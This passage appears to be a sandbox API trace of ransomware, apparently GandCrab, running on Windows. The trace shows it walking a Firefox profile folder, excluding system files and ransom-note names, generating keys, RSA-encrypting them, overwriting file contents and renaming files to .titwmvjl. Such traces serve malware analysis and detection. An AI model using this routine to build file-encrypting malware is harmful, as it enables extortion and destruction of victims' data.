lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1a, wMilliseconds=0xe9)) [0080.923] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.923] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.923] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.924] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock") returned 135 [0080.924] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e4 [0080.925] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.925] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\") returned 111 [0080.925] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*" [0080.925] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x503938 [0080.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.925] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0080.926] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.926] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.926] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0080.926] lstrcmpW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2=".") returned 1 [0080.926] lstrcmpW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="..") returned 1 [0080.926] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" [0080.926] lstrlenW (lpString=".titwmvjl") returned 9 [0080.926] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0080.926] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.926] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.titwmvjl") returned 183 [0080.926] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0080.926] lstrlenW (lpString=".jsonlz4") returned 8 [0080.926] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.926] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0080.926] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0080.926] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0080.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="desktop.ini") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="autorun.inf") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="iconcache.db") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="boot.ini") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="thumbs.db") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="ntldr") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0080.927] lstrcmpiW (lpString1="1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0080.927] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4") returned 174 [0080.927] lstrlenW (lpString=".jsonlz4") returned 8 [0080.927] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.927] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0080.927] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.928] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.928] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0080.930] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.930] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0080.937] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.937] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.937] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0080.940] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.941] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.941] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.941] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0080.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.941] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.941] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.941] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0080.944] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.945] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.945] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.945] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0080.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.945] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.945] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.946] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0080.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.949] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0080.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.949] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0080.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.949] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0080.950] GetLastError () returned 0x0 [0080.950] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.950] CryptDestroyKey (hKey=0x5037b8) returned 1 [0080.950] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.950] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.950] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.950] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0080.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.954] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503578) returned 1 [0080.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.954] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0080.954] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.955] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0080.955] GetLastError () returned 0x0 [0080.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.955] CryptDestroyKey (hKey=0x503578) returned 1 [0080.955] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.955] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.955] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.956] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.956] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x162b, lpOverlapped=0x0) returned 1 [0080.973] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe9d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.973] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x162b, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x162b, lpOverlapped=0x0) returned 1 [0080.974] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.975] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0080.976] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.980] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.980] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.980] CloseHandle (hObject=0x2ec) returned 1 [0080.981] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592260754.fe0bc3a3-866c-458a-ad46-a730981653d6.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0080.982] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.982] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0080.983] lstrcmpW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2=".") returned 1 [0080.983] lstrcmpW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="..") returned 1 [0080.983] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" [0080.983] lstrlenW (lpString=".titwmvjl") returned 9 [0080.983] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0080.983] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.983] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.titwmvjl") returned 183 [0080.983] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0080.983] lstrlenW (lpString=".jsonlz4") returned 8 [0080.983] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.983] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0080.983] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0080.983] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.983] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0080.983] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0080.983] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="desktop.ini") returned -1 [0080.983] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="autorun.inf") returned -1 [0080.983] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0080.983] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="iconcache.db") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="boot.ini") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="thumbs.db") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="ntldr") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0080.984] lstrcmpiW (lpString1="1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0080.984] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4") returned 174 [0080.984] lstrlenW (lpString=".jsonlz4") returned 8 [0080.984] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.984] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0080.984] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.984] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.984] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0080.987] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.987] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0080.999] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.999] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.999] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.002] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.003] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.003] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.003] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.003] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.003] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.003] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.006] VirtualAlloc (lpAddress=0x0, 